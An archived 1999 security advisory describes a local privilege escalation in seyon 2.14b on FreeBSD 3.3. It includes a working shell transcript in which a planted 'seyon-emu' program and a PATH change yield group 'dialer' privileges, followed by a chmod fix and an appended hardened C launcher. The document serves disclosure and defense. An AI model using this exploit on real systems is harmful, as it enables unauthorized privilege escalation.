FreeBSD 3.3's seyon vulnerability

From: Brock Tellier (btellierat_private)
Date: Mon Nov 08 1999 - 19:50:38 PST


    Greetings,
    
    In preparing for this advisory release, I checked for "seyon" vulnerabilities
    in the bugtraq archives.  I found that the exploit I had developed had already
    been discussed in May 1997.  However, this does not change the fact that the
    current version of FreeBSD still ships a vulnerable version with vulnerable
    privs.  I believe this is still worth noting.  Here is my advisory as it was
    to be published before the previous vulnerability came to light.
    
    OVERVIEW
    A vulnerability exists in seyon v2.14b which will allow any user to upgrade
    his or her privs to those with which seyon runs.
    
    BACKGROUND
    This advisory is based entirely off the work I've done on FreeBSD 3.3-RELEASE
    and seyon 2.14b which is included on the FreeBSD installation CD as an
    "additional package".  When installed via sysinstall, seyon's permissions are
    sgid "dialer".  Different versions of seyon and different packages of 2.14b
    may have different default permissions.
    
    DETAILS
    Upon startup, seyon executes the programs "seyon-emu" and "xterm".  The paths
    to these programs are not absolute and are gotten from the user's $PATH.  By
    adding a directory we have write access to in our $PATH and putting our own
    version of seyon-emu or xterm, we can make seyon run this program with egid
    dialer.  
    
    EXPLOIT
    
    bash-2.03$ uname -a; id; ls -la `which seyon`
    FreeBSD  3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999    
    jkhat_private:/usr/src/sys/compile/GENERIC  i386
    uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
    -rwxr-sr-x  1 bin  dialer  88480 Sep 11 00:55 /usr/X11R6/bin/seyon
    bash-2.03$ cat > seyonx.c
    void main () {
      setregid(getegid(), getegid());
      system("/usr/local/bin/bash");
    }
    bash-2.03$ gcc -o seyon-emu seyonx.c
    bash-2.03$ PATH=.:$PATH
    bash-2.03$ seyon
    bash-2.03$ id
    uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
    bash-2.03$ 
    
    FIX
    Simply chmod 750 `which seyon` and add selected users to the "dialer" group.
    
    Brock Tellier
    UNIX Administrator
    Chicago, IL, USA
    btellierat_private
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:10:16 PDT
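
An added example (not part of the original post and not seyon's code) of a code-level fix for the $PATH lookup described under DETAILS: a set-gid program runs its helper by absolute path with a fixed environment, and the child permanently drops the set-gid group before exec. The function names, the `/usr/bin:/bin` value and the assumption that the helper does not need the privileged group are illustrative.

```c
/* Added example: launching a helper from a set-gid program without
 * trusting the caller's $PATH. Names here are hypothetical. */
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently give up the set-gid group; 0 on success, -1 on failure. */
int drop_group_privs(void)
{
    gid_t rgid = getgid(), old_egid = getegid();

    /* Setting real and effective gid together also resets the saved gid. */
    if (setregid(rgid, rgid) != 0)
        return -1;
    /* Verify the drop: the old effective gid must not be recoverable. */
    if (old_egid != rgid && setegid(old_egid) == 0)
        return -1;
    return (getegid() == rgid) ? 0 : -1;
}

/* Run a helper by absolute path with a fixed environment.
 * Returns the helper's exit status, or -1 if it was not run. */
int run_helper(const char *abs_path, char *const argv[])
{
    /* Constructed minimal environment; the caller's PATH is discarded. */
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;               /* refuse names that need a $PATH search */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_group_privs() != 0)
            _exit(126);          /* never exec while still privileged */
        execve(abs_path, argv, clean_env);  /* execve does no PATH search */
        _exit(127);              /* exec failed */
    }
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

An X helper such as xterm would also need a validated DISPLAY value copied into the clean environment.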